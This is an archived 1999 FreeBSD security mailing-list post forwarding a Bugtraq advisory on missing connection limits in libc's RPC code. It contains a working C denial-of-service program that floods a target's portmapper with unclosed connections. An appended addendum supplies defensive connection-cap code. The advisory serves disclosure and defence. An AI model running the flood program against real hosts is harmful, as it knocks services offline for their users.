From owner-freebsd-security  Thu Apr 15 12:58:01 1999
Delivered-To: freebsd-security@freebsd.org
Received: from vtopus.cs.vt.edu (vtopus.cs.vt.edu [128.173.40.24])
	by hub.freebsd.org (Postfix) with ESMTP id B812D14C35
	for ; Thu, 15 Apr 1999 12:57:48 -0700 (PDT)
	(envelope-from dhagan@vtopus.cs.vt.edu)
Received: (from dhagan@localhost)
	by vtopus.cs.vt.edu (8.9.1a/8.9.1) id PAA06227
	for freebsd-security@freebsd.org; Thu, 15 Apr 1999 15:55:26 -0400 (EDT)
Date: Thu, 15 Apr 1999 15:55:24 -0400 (EDT)
From: Daniel Hagan
To: freebsd-security@freebsd.org
Subject: KKIS.08041999.001.b - security raport - flaws in rpc part of libc (fwd)
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

---------- Forwarded message ----------
Date: Wed, 14 Apr 1999 15:26:14 +0200
From: Lukasz Luzar
To: BUGTRAQ@NETSPACE.ORG
Subject: KKIS.08041999.001.b - security raport - flaws in rpc part of libc

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                              S E C U R I T Y
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Contacts ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

  KKI Security Team                    Cracow Commercial Internet, Poland
  http://www.security.kki.pl           http://www.kki.pl
  mailto:security@security.kki.pl      mailto:biuro@kki.pl

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Information ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

  Report title        : Shortcomings of the RPC implementation in libc
                        libraries and how they affect, for example, portmap.
  Problem found by    : Lukasz Luzar (lluzar@security.kki.pl)
  Report created by   : Robert Pajak (shadow@security.kki.pl)
                        Lukasz Luzar (lluzar@security.kki.pl)
  Problem found at    : 08 April 1999
  Report published    : 14 April 1999
  Report code         : KKIS.08041999.001.b
  Short description   : full description below
  Vulnerable versions : libc*, up to current.
  Platforms affected  : Linux X.X, FreeBSD X.X, probably others...
  Patches             : currently not available
  Archive             : http://www.security.kki.pl/advisories/
  Impact description  : full description below
  Risk level          : medium
  Notes               : we were unable to contact the authors of libc

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Description ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

It seems that libc's RPC implementation checks neither the age of
established connections nor the number of connected sockets. This is
quite dangerous, because many network services are based on these
functions.

~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Impact example ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Below is the program which shows how to perform a DoS of portmap (TCP).

When the max. limit of descriptors per process is not set (e.g. the default
settings on FreeBSD), it could easily lead to heavy problems with the
victim's machine stability.

When the limit of open descriptors is reached, portmap begins to refuse all
new connections.

~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Example sources ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

--- CUT HERE ---
/*
 * example.c by Lukasz Luzar (lluzar@security.kki.pl)
 */
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <strings.h>

#define ADDR "10.0.0.1"   // victim's IP address in dot notation
#define PORT 111          // victim service to DoS eg. portmapper

int main(void)
{
    int sockfd, n = 0;
    struct sockaddr_in victim_addr;

    bzero((char *) &victim_addr, sizeof(victim_addr));
    victim_addr.sin_family = AF_INET;
    victim_addr.sin_addr.s_addr = inet_addr(ADDR);
    victim_addr.sin_port = htons(PORT);

    fprintf(stdout, "Opening new connections...\n");

    /* open connections until the local descriptor limit or the remote
       service stops accepting; none of them is ever closed */
    for (;;) {
        if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
            fprintf(stderr, "socket error at %d\n", n);
            break;
        }
        if (connect(sockfd, (struct sockaddr *) &victim_addr,
                    sizeof(victim_addr)) < 0) {
            fprintf(stderr, "connect error at %d\n", n);
            break;
        }
        n++;
    }

    fprintf(stdout, "Established %d connections and waiting...\n", n);
    for (;;);   /* keep the connections open indefinitely */
}
--- CUT HERE ---

~~~~~~~~~~~~~~~~~~~~~~~~[ Copyright statement ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright (c) 1999 KKI Security Team, Poland
All rights reserved.

Please address all questions to mailto:security@security.kki.pl

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
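The two checks the advisory says the libc RPC service loop lacks, a cap on concurrent connections and an idle timeout on established ones, as an added example that is not part of the original message or of the KKI advisory. The table, function names, cap and timeout values are my own assumptions; descriptors are only tracked, not closed, so it runs without a network, and a svc_run-style loop would call conn_admit() after accept() and conn_reap_idle() on each select() timeout.

```c
#include <time.h>
#define MAX_CONNS 4   /* hypothetical cap, kept well below the descriptor limit */
#define IDLE_SECS 30  /* hypothetical idle timeout in seconds; tune per service */

struct conn_table {
    int    fd[MAX_CONNS];           /* -1 marks a free slot */
    time_t last_active[MAX_CONNS];  /* last time the client sent anything */
    int    count;
};

void conn_init(struct conn_table *t)
{
    for (int i = 0; i < MAX_CONNS; i++) t->fd[i] = -1;
    t->count = 0;
}

/* Record activity so a live client is never mistaken for an idle one. */
void conn_touch(struct conn_table *t, int slot, time_t now) { t->last_active[slot] = now; }

/* Drop every connection idle longer than IDLE_SECS; a real server would close(fd) here. */
int conn_reap_idle(struct conn_table *t, time_t now)
{
    int reaped = 0;
    for (int i = 0; i < MAX_CONNS; i++) {
        if (t->fd[i] >= 0 && now - t->last_active[i] > IDLE_SECS) {
            t->fd[i] = -1;
            t->count--;
            reaped++;
        }
    }
    return reaped;
}

/* Register a freshly accepted descriptor: reap idle entries first so silent clients
 * cannot pin the table, then refuse (-1, caller closes the fd) if still full. */
int conn_admit(struct conn_table *t, int fd, time_t now)
{
    if (t->count >= MAX_CONNS) conn_reap_idle(t, now);
    if (t->count >= MAX_CONNS) return -1;
    for (int i = 0; i < MAX_CONNS; i++) {
        if (t->fd[i] < 0) {
            t->fd[i] = fd;
            t->last_active[i] = now;
            t->count++;
            return i;
        }
    }
    return -1;  /* not reached: count < MAX_CONNS guarantees a free slot */
}
```

With this in place a flood of idle connections like the one in the advisory saturates the small table rather than the process descriptor limit, and the oldest silent clients are shed as soon as they pass the timeout.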